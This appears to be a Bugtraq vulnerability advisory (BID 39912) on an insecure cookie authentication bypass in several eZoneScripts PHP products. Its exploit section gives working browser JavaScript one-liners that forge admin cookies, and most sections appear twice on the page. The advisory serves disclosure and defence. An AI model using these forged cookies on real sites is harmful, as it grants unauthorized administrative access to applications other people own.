eZoneScripts Multiple Scripts Insecure Cookie Authentication Bypass Vulnerability
BID:39912
Info
eZoneScripts Multiple Scripts Insecure Cookie Authentication Bypass Vulnerability
| Bugtraq ID: | 39912 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 09 2010 12:00AM |
| Updated: | Feb 09 2010 12:00AM |
| Credit: | JIKO (JAWAD) |
| Vulnerable: |
eZoneScripts phpMiniSite Script 0 eZoneScripts Classified Ultra Script 0 eZoneScripts Banner Exchange Website 0 eZoneScripts Apartment Search Script 0 eZoneScripts Adult Banner Exchange Website 0 |
| Not Vulnerable: | |
Discussion
eZoneScripts Multiple Scripts Insecure Cookie Authentication Bypass Vulnerability
eZoneScripts Banner Exchange Website, Adult Banner Exchange Website, Apartment Search Script, phpMiniSite Script, and Classified Ultra Script are prone to an authentication-bypass vulnerability because they fail to adequately verify user-supplied input used for cookie-based authentication.
Attackers can exploit this vulnerability to gain administrative access to the affected application, which may aid in further attacks.
eZoneScripts Banner Exchange Website, Adult Banner Exchange Website, Apartment Search Script, phpMiniSite Script, and Classified Ultra Script are prone to an authentication-bypass vulnerability because they fail to adequately verify user-supplied input used for cookie-based authentication.
Attackers can exploit this vulnerability to gain administrative access to the affected application, which may aid in further attacks.
Exploit / POC
eZoneScripts Multiple Scripts Insecure Cookie Authentication Bypass Vulnerability
Attackers can exploit these issues via a browser.
The following example cookie data is available:
Banner Exchange Website and Adult Banner Exchange Website:
javascript:document.cookie="bannerexchangename=admin; path=/";
javascript:document.cookie="bannerexchangerand=905; path=/";
Classified Ultra Script:
javascript:document.cookie="AdminPass=1; path=/productdemos/ClassifiedUltra/Site_Admin/";
Apartment Search Script:
javascript:document.cookie="SiteAdminPass=1; path=/productdemos/ApartmentSearch/Site_Admin/";
phpMiniSite Script:
javascript:document.cookie="auth=fook; path=/";
Attackers can exploit these issues via a browser.
The following example cookie data is available:
Banner Exchange Website and Adult Banner Exchange Website:
javascript:document.cookie="bannerexchangename=admin; path=/";
javascript:document.cookie="bannerexchangerand=905; path=/";
Classified Ultra Script:
javascript:document.cookie="AdminPass=1; path=/productdemos/ClassifiedUltra/Site_Admin/";
Apartment Search Script:
javascript:document.cookie="SiteAdminPass=1; path=/productdemos/ApartmentSearch/Site_Admin/";
phpMiniSite Script:
javascript:document.cookie="auth=fook; path=/";
Solution / Fix
eZoneScripts Multiple Scripts Insecure Cookie Authentication Bypass Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]
References
eZoneScripts Multiple Scripts Insecure Cookie Authentication Bypass Vulnerability
References:
References:
- Adult Banner Exchange Website (eZoneScripts)
- Apartment Search Script (eZoneScripts)
- Banner Exchange Website (eZoneScripts)
- Classified Ultra Script (eZoneScripts)
- phpMiniSite Script (eZoneScripts)